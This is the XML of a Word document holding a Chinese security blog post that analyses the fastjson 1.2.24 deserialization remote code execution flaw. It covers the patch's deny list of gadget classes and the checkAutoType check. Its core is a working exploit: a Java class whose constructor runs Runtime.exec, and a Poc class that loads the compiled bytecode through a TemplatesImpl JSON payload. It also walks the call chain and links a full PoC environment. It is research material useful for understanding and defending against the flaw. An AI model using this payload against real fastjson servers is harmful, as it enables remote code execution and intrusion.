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fastjson 反序列化 poc 1.2.24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B1010" w:rsidRPr="000B1010" w:rsidRDefault="000B1010" w:rsidP="000B1010">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="300" w:after="30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B101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left" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#555" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B1010" w:rsidRPr="000B1010" w:rsidRDefault="000B1010" w:rsidP="000B1010">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1010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2017.5.3日更新：增加_tfactory为一个空object即</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1010">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>{ }</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1010">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>，使poc在各个jdk版本都起作用。影响版本更新：fastjson-1.2.22到1.2.24区间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B1010" w:rsidRPr="000B1010" w:rsidRDefault="000B1010" w:rsidP="000B101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B1010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1 背景</w:t>
      </w:r>
    </w:p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fastjson是一个java编写的高性能功能非常完善的JSON库，应用范围非常广，在github上star数都超过8k，在2017年3月15日，fastjson官方主动爆出fastjson在1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。关于漏洞的具体详情可参考 </w:t>
      </w:r>
      <w:r w:rsidRPr="000B1010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https://github.com/alibaba/fastjson/wiki/security_update_20170315</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B1010" w:rsidRPr="000B1010" w:rsidRDefault="000B1010" w:rsidP="000B101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B1010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2 受影响的版本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B1010" w:rsidRPr="000B1010" w:rsidRDefault="000B1010" w:rsidP="000B1010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0B1010">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fastjson &lt;= 1.2.24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B1010" w:rsidRPr="000B1010" w:rsidRDefault="000B1010" w:rsidP="000B101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B1010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3 静态分析</w:t>
      </w:r>
    </w:p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根据官方给出的补丁文件，主要的更新在这个checkAutoType函数上，而这个函数的主要功能就是添加了黑名单，将一些常用的反序列化利用库都添加到黑名单中。具体包括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"/>
        <w:gridCol w:w="8277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bsh,com.mchange,com.sun.,java.lang.Thread,java.net.Socket,java.rmi,javax.xml,org.apache.bcel,org.apache.commons.beanutils,org.apache.commons.collections.Transformer,org.apache.commons.collections.functors,org.apache.commons.collections4.comparators,org.apache.commons.fileupload,org.apache.myfaces.context.servlet,org.apache.tomcat,org.apache.wicket.util,org.codehaus.groovy.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lastRenderedPageBreak/>
              <w:t>runtime,org.hibernate,org.jboss,org.mozilla.javascript,org.python.core,org.springframework</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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下面我们来分析checkAutoType的函数实现：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Class&lt;?&gt; checkAutoType(String typeName, Class&lt;?&gt; expectClass)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(typeName ==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(typeName.length() &gt;= maxTypeNameLength)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JSONException(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"autoType is not support. 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+ typeName);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final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String className = typeName.replace(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'$'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,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'.'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(autoTypeSupport || expectClass !=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for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int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i =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0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 i &lt; acceptList.length; ++i)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String accept = acceptList[i];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(className.startsWith(accept))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TypeUtils.loadClass(typeName, defaultClassLoader);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for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int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i =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0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 i &lt; denyList.length; ++i)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String deny = denyList[i];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(className.startsWith(deny))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JSONException(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"autoType is not support. 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+ typeName);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Class&lt;?&gt; clazz = TypeUtils.getClassFromMapping(typeName);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(clazz ==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clazz = deserializers.findClass(typeName);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(clazz !=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(expectClass !=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&amp;&amp; !expectClass.isAssignableFrom(clazz))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JSONException(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"type not match. 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+ typeName +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 -&gt; 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+ expectClass.getName());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clazz;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核心部分就是denyList的处理过程，遍历denyList，如果引入的库以denyList中某个deny打头，就会抛出异常，中断运行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B1010" w:rsidRPr="000B1010" w:rsidRDefault="000B1010" w:rsidP="000B101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B1010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4 POC构造</w:t>
      </w:r>
    </w:p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静态分析得知，要构造一个可用的poc，肯定得引入denyList的库。刚开始fastjson官方公布漏洞信息时，当时就尝试构造poc，怎奈fastjson的代码确实庞大，还有asm机制，通过asm机制生成的临时代码下不了断点。当时也只能通过在通过类初始化的时候弹出一个计算器，很显然这个构造方式不具有通用性，最近jackson爆出反序列漏洞，其中就利用了TemplatesImpl类，而这个类有一个字段就是_bytecodes，有部分函数会根据这个_bytecodes生成java实例，简直不能再更妙，这就解决了fastjson通过字段传入一个类，再通过这个类执行有害代码。后来阅读ysoserial的代码时也发现在gadgets.java这个文件中也使用到了这个类来动态生成可执行命令的代码。下面是一个poc的代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20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lastRenderedPageBreak/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com.sun.org.apache.xalan.internal.xsltc.DOM;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com.sun.org.apache.xalan.internal.xsltc.TransletException;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com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;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com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;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com.sun.org.apache.xml.internal.serializer.SerializationHandler;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java.io.IOException;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class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Test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extends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AbstractTranslet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Test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IOException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Runtime.getRuntime().exec(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"calc"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@Override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void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transform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(DOM document, DTMAxisIterator iterator, SerializationHandler handler)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@Override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void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transform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(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] handlers)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TransletException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lastRenderedPageBreak/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static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void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main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(String[] args)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Exception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Test t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Test();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}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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这个是Test.java的实现，在Test.java的构造函数中执行了一条命令，弹出计算器。编译Test.java得到Test.class供后续使用。后续会将Test.class的内容赋值给_bytecodes。接着分析poc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"/>
        <w:gridCol w:w="8135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20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42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lastRenderedPageBreak/>
              <w:t>package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person;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com.alibaba.fastjson.JSON;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com.alibaba.fastjson.parser.Feature;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com.alibaba.fastjson.parser.ParserConfig;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org.apache.commons.io.IOUtils;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org.apache.commons.codec.binary.Base64;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java.io.ByteArrayOutputStream;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java.io.File;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java.io.FileInputStream;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import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java.io.IOException;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/**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* Created by web on 2017/4/29.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*/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class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Poc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static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String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readClass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(String cls)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ByteArrayOutputStream bos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ByteArrayOutputStream();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try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IOUtils.copy(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FileInputStream(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File(cls)), bos);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(IOException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e.printStackTrace();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Base64.encodeBase64String(bos.toByteArray());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static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void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test_autoTypeDeny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Exception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ParserConfig config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ParserConfig();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final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String fileSeparator = System.getProperty(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"file.separator"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final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String evilClassPath = System.getProperty(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"user.dir"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) +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"\\target\\classes\\person\\Test.class"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String evilCode = readClass(evilClassPath);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final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String NASTY_CLASS =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"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"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String text1 =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"{\"@type\":\""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+ NASTY_CLASS +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"\",\"_bytecodes\":[\""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+evilCode+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"\"],'_name':'a.b','_tfactory':{ },\"_outputProperties\":{ },"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+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"\"_name\":\"a\",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}\n"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System.out.println(text1);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Object obj = JSON.parseObject(text1, Object.class, config, Feature.SupportNonPublicField);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//assertEquals(Model.class, obj.getClass());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static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void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main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(String args[])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try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test_autoTypeDeny();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(Exception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e.printStackTrace();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}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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在这个poc中，最核心的部分是_bytecodes，它是要执行的代码，@type是指定的解析类，fastjson会根据指定类去反序列化得到该类的实例，在默认情况下，fastjson只会反序列化公开的属性和域，而com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl中_bytecodes却是私有属性，_name也是私有域，所以在parseObject的时候需要设置Feature.SupportNonPublicField，这样_bytecodes字段才会被反序列化。_tfactory这个字段在TemplatesImpl既没有get方法也没有set方法，这没关系，我们设置_tfactory为</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1010">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>{ }</w:t>
      </w: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,fastjson会调用其无参构造函数得_tfactory对象，这样就解决了某些版本中在defineTransletClasses()用到会引用_tfactory属性导致异常退出。接下来我们看下TemplatesImpl.java的几个关键函数：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938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lastRenderedPageBreak/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synchronized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Properties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getOutputProperties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try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newTransformer().getOutputProperties();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(TransformerConfigurationException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}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000B1010" w:rsidRPr="000B1010" w:rsidRDefault="000B1010" w:rsidP="000B101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synchronized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Transformer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newTransformer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TransformerImpl transformer;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transformer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TransformerImpl(getTransletInstance(), _outputProperties,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_indentNumber, _tfactory);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(_uriResolver !=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transformer.setURIResolver(_uriResolver);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(_tfactory.getFeature(XMLConstants.FEATURE_SECURE_PROCESSING))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transformer.setSecureProcessing(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true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}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000B1010" w:rsidRPr="000B1010" w:rsidRDefault="000B1010" w:rsidP="000B101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25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lastRenderedPageBreak/>
              <w:t>private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Translet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getTransletInstance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try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(_name ==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)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(_class ==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defineTransletClasses();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// The translet needs to keep a reference to all its auxiliary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// class to prevent the GC from collecting them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AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();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translet.postInitialization();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translet.setTemplates(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this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translet.setServicesMechnism(_useServicesMechanism);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(_auxClasses !=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translet.setAuxiliaryClasses(_auxClasses);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translet;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(InstantiationException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ErrorMsg err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ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);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TransformerConfigurationException(err.toString());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(IllegalAccessException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lastRenderedPageBreak/>
              <w:t xml:space="preserve">            ErrorMsg err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ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);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TransformerConfigurationException(err.toString());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0B1010" w:rsidRPr="000B1010" w:rsidRDefault="000B1010" w:rsidP="000B1010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40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lastRenderedPageBreak/>
              <w:t>private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void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defineTransletClasses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throws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(_bytecodes ==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null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ErrorMsg err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ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);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TransformerConfigurationException(err.toString());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TransletClassLoader loader = (TransletClassLoader)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AccessController.doPrivileged(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PrivilegedAction()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public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Object </w:t>
            </w:r>
            <w:r w:rsidRPr="000B1010">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="66CCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>run</w:t>
            </w:r>
            <w:r w:rsidRPr="000B1010">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="F99157"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
            <w:r w:rsidRPr="000B1010">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6699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return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TransletClassLoader(ObjectFactory.findClassLoader());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try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final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int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classCount = _bytecodes.length;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_class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Class[classCount];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(classCount &gt;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1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_auxClasses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Hashtable();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for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int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i =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0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; i &lt; classCount; i++)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_class[i] = loader.defineClass(_bytecodes[i]);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final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Class superClass = _class[i].getSuperclass();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// Check if this is the main class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(superClass.getName().equals(ABSTRACT_TRANSLET))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    _transletIndex = i;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else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    _auxClasses.put(_class[i].getName(), _class[i]);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if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(_transletIndex &lt; </w:t>
            </w:r>
            <w:r w:rsidRPr="000B1010">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="99CC99"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>0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ErrorMsg err=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ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name);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TransformerConfigurationException(err.toString());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(ClassFormatError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lastRenderedPageBreak/>
              <w:t xml:space="preserve">            ErrorMsg err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ErrorMsg(ErrorMsg.TRANSLET_CLASS_ERR, _name);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TransformerConfigurationException(err.toString());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catch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(LinkageError e) {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ErrorMsg err =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ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);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   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throw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</w:t>
            </w:r>
            <w:r w:rsidRPr="000B1010">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CC99CC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>new</w:t>
            </w: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TransformerConfigurationException(err.toString());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    }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在getTransletInstance调用defineTransletClasses，在defineTransletClasses方法中会根据_bytecodes来生成一个java类，生成的java类随后会被getTransletInstance方法用到生成一个实例，也也就到了最终的执行命令的位置Runtime.getRuntime.exec()</w:t>
      </w:r>
    </w:p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下面我们上一张调用链的图，</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1010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6648450" cy="4114800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="调用链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调用链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,简单来说就是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3629"/>
      </w:tblGrid>
      <w:tr w:rsidR="000B1010" w:rsidRPr="000B1010" w:rsidTr="000B10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lastRenderedPageBreak/>
              <w:t>1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2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3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4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5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6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7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8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9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10</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B1010" w:rsidRPr="000B1010" w:rsidRDefault="000B1010" w:rsidP="000B1010">
            <w:pPr>
              <w:widowControl/>
              <w:shd w:val="clear" w:color="auto" w:fill="1B1B1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999999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JSON.parseObject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...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JavaBeanDeserializer.deserialze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...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FieldDeserializer.setValue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...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TemplatesImpl.getOutputProperties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TemplatesImpl.newTransformer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TemplatesImpl.getTransletInstance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...</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B1010" w:rsidRPr="000B1010" w:rsidRDefault="000B1010" w:rsidP="000B1010">
            <w:pPr>
              <w:widowControl/>
              <w:shd w:val="clear" w:color="auto" w:fill="2D2D2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</w:pPr>
            <w:r w:rsidRPr="000B1010">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Runtime.getRuntime().exec</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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附上一张成功执行图：</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1010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>
            <wp:extent cx="10850880" cy="7303770"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="1" name="图片 1" descr="运行成功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运行成功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0880" cy="730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010" w:rsidRPr="000B1010" w:rsidRDefault="000B1010" w:rsidP="000B1010">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:outlineLvl w:val="0"/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</w:pPr>
      <w:r w:rsidRPr="000B1010">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="555555"/>
          <w:kern w:val="36"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>5 总结</w:t>
      </w:r>
    </w:p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poc影响jdk 1.7，1.8版本，1.6未测试，但是需要在parseObject的时候设置Feature.SupportNonPublicField，告诉个不幸的消息，该字段在fastjson1.2.22版本引入，这么一说的话就是poc只能在1.2.22和1.2.24版本区间起作用。最后给大家上个福利，github地址：完整的Intellij IDEA poc环境:</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="000B1010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https://github.com/shengqi158/fastjson-remote-code-execute-poc</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000B1010" w:rsidRPr="000B1010" w:rsidRDefault="000B1010" w:rsidP="000B1010">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="375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t>本文地址：</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1010">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="000B1010">
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
            <w:color w:val="555555"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EF2488" w:rsidRDefault="00EF2488">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00EF24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60"/>
    <w:rsid w:val="000B1010"/>
    <w:rsid w:val="00E12960"/>
    <w:rsid w:val="00E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66450-7B0E-48C1-9383-365A7224B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B10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B101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B10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B101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B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B101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B101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0B1010"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML0">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTML1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000B1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0B1010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0B1010"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="string">
    <w:name w:val="string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000B1010"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="number">
    <w:name w:val="number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000B1010"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="class">
    <w:name w:val="class"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000B1010"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="title">
    <w:name w:val="title"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000B1010"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="function">
    <w:name w:val="function"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000B1010"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="params">
    <w:name w:val="params"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000B1010"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="meta">
    <w:name w:val="meta"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000B1010"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="comment">
    <w:name w:val="comment"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000B1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7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4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1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4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9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6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7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4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ngqi158/fastjson-remote-code-execute-po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legend.com/images/run-ok.p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://xxlegend.com/images/diaoyonglian.png" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%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1712</Words>
  <Characters>9761</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>81</Lines>
  <Paragraphs>22</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>11451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cfchi</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>cfchi</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-05-18T14:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-05-18T14:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>